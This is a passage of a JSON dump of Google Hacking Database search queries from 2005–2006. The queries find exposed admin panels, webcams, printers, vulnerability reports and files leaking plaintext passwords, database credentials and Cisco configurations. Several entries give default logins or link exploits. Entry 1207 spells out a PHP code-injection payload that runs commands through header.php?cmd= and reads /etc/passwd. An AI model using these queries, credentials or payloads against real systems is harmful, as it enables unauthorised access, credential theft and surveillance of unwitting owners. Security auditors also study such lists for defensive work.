0.18\"", "long description": "cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report athttp://search.securityfocus.com/archive/1/411591/30/0/threaded", "submited": "2005-10-03", "request": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "id": 1159}, {"short description": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "long description": "This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom.  The default admin username/password are root/system.", "submited": "2005-10-03", "request": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "id": 1160}, {"short description": "intitle:\"urchin (5|3|admin)\" ext:cgi", "long description": "Gain access to Urchin analysis reports.", "submited": "2005-10-04", "request": "intitle:\"urchin (5|3|admin)\" ext:cgi", "id": 1161}, {"short description": "inurl:status.cgi?host=all", "long description": "Nagios Status page. See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first.", "submited": "2005-10-04", "request": "inurl:status.cgi?host=all", "id": 1162}, {"short description": "inurl:polly/CP", "long description": "You can get into admin panel without logging.", "submited": "2005-10-06", "request": "inurl:polly/CP", "id": 1163}, {"short description": "\"Cyphor (Release:\" -www.cynox.ch", "long description": "Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory &amp; poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained.", "submited": "2005-10-08", "request": "\"Cyphor (Release:\" -www.cynox.ch", "id": 1164}, {"short description": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "long description": "versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html", "submited": "2005-10-10", "request": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "id": 1165}, {"short description": "inurl:ocw_login_username", "long description": "WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker", "submited": "2005-10-13", "request": "inurl:ocw_login_username", "id": 1166}, {"short description": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "long description": "AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information.", "submited": "2005-10-22", "request": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "id": 1167}, {"short description": "\"The following report contains confidential information\" vulnerability -search", "long description": "This googledork reveals vunerability reports from many different vendors.  These reports can contain information which can help an attacker break into a system/network.", "submited": "2005-10-26", "request": "\"The following report contains confidential information\" vulnerability -search", "id": 1168}, {"short description": "\"Shadow Security Scanner performed a vulnerability assessment\"", "long description": "This is a googledork to find vulnerability reports produced by Shadow Security Scanner.  They contain valuable information which can be used to break into a system.", "submited": "2005-10-26", "request": "\"Shadow Security Scanner performed a vulnerability assessment\"", "id": 1169}, {"short description": "intitle:\"Docutek ERes - Admin Login\" -edu", "long description": "Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page.  Using Docutek Eres you can look through course material amoung other things.", "submited": "2005-10-26", "request": "intitle:\"Docutek ERes - Admin Login\" -edu", "id": 1170}, {"short description": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "long description": "This googledork finds vulnerability reports produced by eEye Retina Security Scanner.  The information inside these reports can help an attacker break into a system/network.", "submited": "2005-10-26", "request": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "id": 1171}, {"short description": "intitle:\"CJ Link Out V1\"", "long description": "A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site.  The vulnerability report can be found at http://secunia.com/advisories/16970/ .", "submited": "2005-10-26", "request": "intitle:\"CJ Link Out V1\"", "id": 1172}, {"short description": "server-dbs \"intitle:index of\"", "long description": "Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text.", "submited": "2005-10-30", "request": "server-dbs \"intitle:index of\"", "id": 1173}, {"short description": "inurl:\"Sites.dat\"+\"PASS=\"", "long description": "FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist.  the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects.", "submited": "2005-11-03", "request": "inurl:\"Sites.dat\"+\"PASS=\"", "id": 1174}, {"short description": "(\"port_255/home\")|(inurl:\"home?port=255\")", "long description": "standered printer search. Moderator note: see also dork id=1221", "submited": "2005-11-05", "request": "(\"port_255/home\")|(inurl:\"home?port=255\")", "id": 1175}, {"short description": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "long description": "several different samsung printers", "submited": "2005-11-11", "request": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "id": 1176}, {"short description": "log inurl:linklint filetype:txt -\"checking\"", "long description": "Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction.", "submited": "2005-11-11", "request": "log inurl:linklint filetype:txt -\"checking\"", "id": 1177}, {"short description": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "long description": "Moodle", "submited": "2005-11-12", "request": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "id": 1178}, {"short description": "\"Powered by XOOPS 2.2.3 Final\"", "long description": "XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory &amp; poc exploit:http://rgod.altervista.org/xoops_xpl.html", "submited": "2005-11-12", "request": "\"Powered by XOOPS 2.2.3 Final\"", "id": 1179}, {"short description": "inurl:\"wfdownloads/viewcat.php?list=\"", "long description": "XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory &amp; poc exploit:http://rgod.altervista.org/xoops_xpl.html", "submited": "2005-11-12", "request": "inurl:\"wfdownloads/viewcat.php?list=\"", "id": 1180}, {"short description": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "long description": "This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity.", "submited": "2005-11-12", "request": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "id": 1181}, {"short description": "intitle:\"EXTRANET * - Identification\"", "long description": "WorkZone Extranet Solution login page. All portals are in french or spanish I belive.", "submited": "2005-11-12", "request": "intitle:\"EXTRANET * - Identification\"", "id": 1182}, {"short description": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "long description": "This search finds many different Extranet login pages.", "submited": "2005-11-12", "request": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "id": 1183}, {"short description": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "long description": "HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment.", "submited": "2005-11-12", "request": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "id": 1184}, {"short description": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "long description": "Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability.", "submited": "2005-11-12", "request": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "id": 1185}, {"short description": "\"iCONECT 4.1 :: Login\"", "long description": "This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information including email, native files, and images from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available.", "submited": "2005-11-12", "request": "\"iCONECT 4.1 :: Login\"", "id": 1186}, {"short description": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "long description": "Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare", "submited": "2005-11-13", "request": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "id": 1187}, {"short description": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "long description": "User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com", "submited": "2005-11-16", "request": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "id": 1188}, {"short description": "ext:yml database inurl:config", "long description": "Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text.", "submited": "2005-11-14", "request": "ext:yml database inurl:config", "id": 1189}, {"short description": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "long description": "Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search.", "submited": "2005-11-16", "request": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "id": 1190}, {"short description": "inurl:webvpn.html \"login\" \"Please enter your\"", "long description": "The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products.", "submited": "2005-11-16", "request": "inurl:webvpn.html \"login\" \"Please enter your\"", "id": 1191}, {"short description": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "long description": "Intel Netport Express Print Server.", "submited": "2005-11-16", "request": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "id": 1192}, {"short description": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "long description": "iLo and related login pages !? Whoops..", "submited": "2005-11-16", "request": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "id": 1193}, {"short description": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "long description": "Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office", "submited": "2005-11-16", "request": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "id": 1194}, {"short description": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "long description": "An attacker may want to know about the antivirus software running.  The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host.", "submited": "2005-11-16", "request": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "id": 1195}, {"short description": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "long description": "Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10", "submited": "2005-11-16", "request": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "id": 1196}, {"short description": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "long description": "Login pages for Ciso VPN Concentrator stuff", "submited": "2005-11-16", "request": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "id": 1197}, {"short description": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "long description": "Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future.", "submited": "2005-11-16", "request": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "id": 1198}, {"short description": "\"This website was created with phpWebThings 1.4\"", "long description": "This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in \"msg\" parameter:http://rgod.altervista.org/phpwebth14_xpl.html", "submited": "2005-11-17", "request": "\"This website was created with phpWebThings 1.4\"", "id": 1199}, {"short description": "\"site info for\" \"Enter Admin Password\"", "long description": "This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)", "submited": "2005-11-21", "request": "\"site info for\" \"Enter Admin Password\"", "id": 1200}, {"short description": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "long description": "***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/).", "submited": "2005-11-21", "request": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "id": 1201}, {"short description": "Display Cameras intitle:\"Express6 Live Image\"", "long description": "Express6 live video controller.Displays video from \"Netlive Cameras\" found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=1416Several new cameras found in this search.", "submited": "2005-11-21", "request": "Display Cameras intitle:\"Express6 Live Image\"", "id": 1202}, {"short description": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "long description": "The SNT-V304 Video Network Station.Sony's network camera control station.", "submited": "2005-11-21", "request": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "id": 1203}, {"short description": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "long description": "this dork is for Mambo 4.5.2x Globals overwrite / remote command execution  exploit:http://rgod.altervista.org/mambo452_xpl.html", "submited": "2005-11-23", "request": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "id": 1204}, {"short description": "inurl:wp-mail.php  + \"There doesn't seem to be any new mail.\"", "long description": "This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s).", "submited": "2005-11-24", "request": "inurl:wp-mail.php  + \"There doesn&#039;t seem to be any new mail.\"", "id": 1205}, {"short description": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "long description": "eFiction", "submited": "2005-11-25", "request": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "id": 1206}, {"short description": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "long description": "dork: \"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it?  The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&amp;hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board\"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" now in config.dat we have: ... $title=\"Ultimate PHP Board \"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" \"; ... in header.php we have: ... include \"./db/config.dat\"; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd", "submited": "2005-11-25", "request": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "id": 1207}, {"short description": "\"powered by GuppY v4\"|\"Site cravec GuppY v4\"", "long description": "Guppy  remote code execution / various arbitrary inclusion issuesadvisory &amp; poc exploit:http://rgod.altervista.org/guppy459_xpl.html", "submited": "2005-11-28", "request": "\"powered by GuppY v4\"|\"Site cravec GuppY v4\"", "id": 1208}, {"short description": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "long description": "this is for NetworkActiv-Web-Server directory listing", "submited": "2005-11-28", "request": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "id": 1209}, {"short description": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "long description": "This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=2784&amp;highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=180", "submited": "2005-11-28", "request": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "id": 1210}, {"short description": "\"Powered by Xaraya\" \"Copyright 2005\"", "long description": "Xaraya", "submited": "2005-11-29", "request": "\"Powered by Xaraya\" \"Copyright 2005\"", "id": 1211}, {"short description": "\"parent directory\" +proftpdpasswd", "long description": "User names and password hashes from web server backups generated by cpanel for ProFTPd.  Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well.", "submited": "2005-11-30", "request": "\"parent directory\" +proftpdpasswd", "id": 1212}, {"short description": "\"This website powered by PHPX\" -demo", "long description": "this is the dork for PhpX", "submited": "2005-11-30", "request": "\"This website powered by PHPX\" -demo", "id": 1213}, {"short description": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "long description": "by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)", "submited": "2005-12-01", "request": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "id": 1214}, {"short description": "\"Based on DoceboLMS 2.0\"", "long description": "advisory &amp; poc exploit:http://rgod.altervista.org/docebo204_xpl.html", "submited": "2005-12-04", "request": "\"Based on DoceboLMS 2.0\"", "id": 1215}, {"short description": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "long description": "this is the dork for Sugar Suite 3.5.2a &amp; 4.0beta remote code execution issue, advisory &amp; poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html", "submited": "2005-12-07", "request": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "id": 1216}, {"short description": "inurl:Printers/ipp_0001.asp", "long description": "Thanks to Windows 2003 Remote Printing", "submited": "2005-12-08", "request": "inurl:Printers/ipp_0001.asp", "id": 1217}, {"short description": "\"Powered By phpCOIN 1.2.2\"", "long description": "PhpCOIN 1.2.2 arbitrary remote\\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:\"Powered By phpCOIN\"to see previous verions (not tested)", "submited": "2005-12-12", "request": "\"Powered By phpCOIN 1.2.2\"", "id": 1218}, {"short description": "intext:\"Powered by SimpleBBS v1.1\"*", "long description": "Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594", "submited": "2005-12-14", "request": "intext:\"Powered by SimpleBBS v1.1\"*", "id": 1219}, {"short description": "\"Site powered By Limbo CMS\"", "long description": "this is the dork for Limbo Cms", "submited": "2005-12-14", "request": "\"Site powered By Limbo CMS\"", "id": 1220}, {"short description": "inurl:ventrilo_srv.ini adminpassword", "long description": "This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server.", "submited": "2005-12-19", "request": "inurl:ventrilo_srv.ini adminpassword", "id": 1221}, {"short description": "inurl:guestbook/guestbooklist.asp \"Post Date\" From Country", "long description": "A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork):  inurl:guestbook/guestbooklist.asp \"Post Date\" From Country    Results 1 - 21 of 123Announcement:  inurl:MainAnnounce1.asp \"show all\"    Results 1 -20 of 86WebDirectory:  inurl:webdirectory \"Total Available Web Sites\" Search    Results 1 - 4 of 5MailingList:   inurl:maillinglist/emailsadd.asp    Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin.  Some results leave this info on the page and others load the page with this info already filled out.", "submited": "2005-12-19", "request": "inurl:guestbook/guestbooklist.asp \"Post Date\" From", "id": 1222}, {"short description": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "long description": "Miva Merchant is a product that helps buisnesses get into e-commerce.  This dork locates their admin login.", "submited": "2005-12-19", "request": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "id": 1223}, {"short description": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "long description": "sift Group makes a web site administration product which can be accessed via a web browser.  This dork locates their admin login.", "submited": "2005-12-19", "request": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "id": 1224}, {"short description": "intitle:\"b2evo &gt; Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\"  -demo -site:b2evolution.net", "long description": "b2evolution is a free open-source blogging system from b2evolution.net.  This dork finds the admin login.", "submited": "2005-12-19", "request": "intitle:\"b2evo &gt; Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\"  -demo -site:b2evolution.net", "id": 1225}, {"short description": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "long description": "WebStatistica provides detailed statistics about a web page.  Normally you would have to login to view these statistics but the sites have put autologin on.", "submited": "2005-12-19", "request": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "id": 1226}, {"short description": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "long description": "Information about proxy servers, internal ip addresses and other network sensitive stuff.", "submited": "2005-12-21", "request": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "id": 1227}, {"short description": "inurl:/cgi-bin/pass.txt", "long description": "Passwords", "submited": "2005-12-22", "request": "inurl:/cgi-bin/pass.txt", "id": 1228}, {"short description": "\"Emergisoft web applications are a part of our\"", "long description": "Hospital patient management system, in theory it could be dangerous.", "submited": "2005-12-31", "request": "\"Emergisoft web applications are a part of our\"", "id": 1229}, {"short description": "inurl:/img/vr.htm", "long description": "Linksys wireless G Camera.", "submited": "2005-12-31", "request": "inurl:/img/vr.htm", "id": 1230}, {"short description": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "long description": "CubeCart is an eCommerce script written with PHP &amp; MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: \"Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke\"", "submited": "2005-12-31", "request": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "id": 1231}, {"short description": "inurl:ovcgi/jovw", "long description": "An HP Java network management tool. It is a sign that a network may not be configured properly.", "submited": "2005-12-31", "request": "inurl:ovcgi/jovw", "id": 1232}, {"short description": "intitle:Axis inurl:\"/admin/admin.shtml\"", "long description": "similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration.", "submited": "2005-12-31", "request": "intitle:Axis inurl:\"/admin/admin.shtml\"", "id": 1233}, {"short description": "DCS inurl:\"/web/login.asp\"", "long description": "Login pages for the DCS-950 Web Camera. Even comes with a built in microphone.", "submited": "2005-12-31", "request": "DCS inurl:\"/web/login.asp\"", "id": 1234}, {"short description": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "long description": "Dell laser printers. This search finds different results that dork id 1077.", "submited": "2006-01-02", "request": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "id": 1235}, {"short description": "filetype:bak createobject sa", "long description": "This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters \"sa\" (default SQL server admin id) and \"createobject\" which is requisite VBScript for opening some sort of odbc/ado connection.  Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use \"server=127.0.0.1\" so you know IIS &amp; SQL Server are running on the same box.", "submited": "2006-01-01", "request": "filetype:bak createobject sa", "id": 1236}, {"short description": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "long description": "betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins.", "submited": "2006-01-02", "request": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "id": 1237}, {"short description": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "long description": "This search finds CLEARTEXT usernames/passwords for the Results Database Editor.  The log in portal can be found at /editor/login.asp.  At time of submitting there are 21 results.Also a search for the logins:inurl:\"Results/editor/login.asp\"\"Database Editor Login\" \"Results Page\"", "submited": "2006-01-02", "request": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "id": 1238}, {"short description": "ext:passwd -intext:the -sample -example", "long description": "Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search.", "submited": "2006-01-02", "request": "ext:passwd -intext:the -sample -example", "id": 1239}, {"short description": "enable password | secret \"current configuration\" -intext:the", "long description": "Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, \"secret 5\" and \"password 7\" passwords.", "submited": "2006-01-02", "request": "enable password | secret \"current configuration\" -intext:the", "id": 1240}, {"short description": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "long description": "search for plaintext database credentials in ASA and BAK files.", "submited": "2006-01-02", "request": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "id": 1241}, {"short description": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "long description": "PHPGedView", "submited": "2006-01-02", "request": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "id": 1242}, {"short description": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "long description": "DEV cms", "submited": "2006-01-02", "request": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "id": 1243}, {"short description": "intitle:\"phpDocumentor web interface\"", "long description": "Php Documentor &lt; = 1.3.0 rc4 remote code xctn dork: intitle:\"phpDocumentor web interface\"advisory &amp; poc exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html", "submited": "2006-01-02", "request": "intitle:\"phpDocumentor web interface\"", "id": 1244}, {"short description": "inurl:\"tmtrack.dll?\"", "long description": "This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the \"tmtrack.dll?\" like thistmtrack.dll?LoginPagetmtrack.dll?View&amp;Template=viewand more.", "submited": "2006-01-04", "request": "inurl:\"tmtrack.dll?\"", "id": 1245}, {"short description": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "long description": "logon portal to the mitel 330 integrated communications platform.[Mitel 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]", "submited": "2006-01-14", "request": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "id": 1246}, {"short description": "intitle:Ovislink inurl:private/login", "long description": "Ovislink vpn login page.", "submited": "2006-01-16", "request": "intitle:Ovislink inurl:private/login", "id": 1247}, {"short description": "intitle:\"::::: INTELLINET IP Camera Homepage :::::\" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi", "long description": "A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:\"Administrator Menu\" \"camera Name\" \"Location\" \"frame rate\" intitle:network.camera -pdfThanks jeffball.", "submited": "2006-01-16", "request": "intitle:\"::::: INTELLINET IP Camera Homepage :::::", "id": 1248}, {"short description": "filetype:pl intitle:\"Ultraboard Setup\"", "long description": "setup pages to the ultraboard system.", "submited": "2006-01-16", "request": "filetype:pl intitle:\"Ultraboard Setup\"", "id": 1249}, {"short description": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "long description": "Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible", "submited": "2006-01-16", "request": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "id": 1250}, 